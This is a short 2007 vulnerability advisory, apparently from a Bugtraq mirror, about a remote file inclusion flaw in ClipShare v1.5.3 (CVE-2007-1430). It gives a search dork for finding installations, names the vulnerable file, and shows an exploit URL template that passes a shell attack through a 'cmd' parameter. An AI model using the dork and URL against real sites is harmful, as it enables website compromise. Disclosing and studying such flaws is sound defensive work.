Bug: Remote File Include In ClipShare.v1.5.3 ( Ascii Version )

Search:
WLB2

Remote File Include In ClipShare.v1.5.3

Published
Credit
Risk
2007.03.14
RaeD Hasadya
High
CWE
CVE
Local
Remote
N/A
CVE-2007-1430
No
Yes
 Dork: "Copyright © 2006 Powered By Clip-Share.Com. All rights reserved"

CVSS Base Score
Impact Subscore
Exploitability Subscore
7.5/10
6.4/10
10/10
Exploit range
Attack complexity
Authentication
Remote
Low
No required
Confidentiality impact
Integrity impact
Availability impact
Partial
Partial
Partial

By Hasadya Raed
Contact : RaeD [At] BsdMail [Dot] Com / GunMan_Pump [At] Hotmail [Dot] Com
------------------------------------------------------------------------
----------------------------
Script : ClipShare.v1.5.3
Dork : "Copyright © 2006 Powered By Clip-Share.Com. All rights reserved"
------------------------------------------------------------------------
----------------------------
B.File :
adodb-connection.inc.php
------------------------------------------------------------------------
----------------------------
Exploit :
http://www.Victim.com/Path/include/adodb-connection.inc.php?cmd=[Shell-A
ttack]
------------------------------------------------------------------------
----------------------------

--
_______________________________________________
Get your free email from http://bsdmail.com

See this note in TXT Version

Bugtraq RSS
Bugtraq
 
REDDIT
REDDIT
 
DIGG
DIGG
 
LinkedIn
LinkedIn
 
CVE RSS
CVEMAP

Copyright 2014, cxsecurity.com
Ascii Version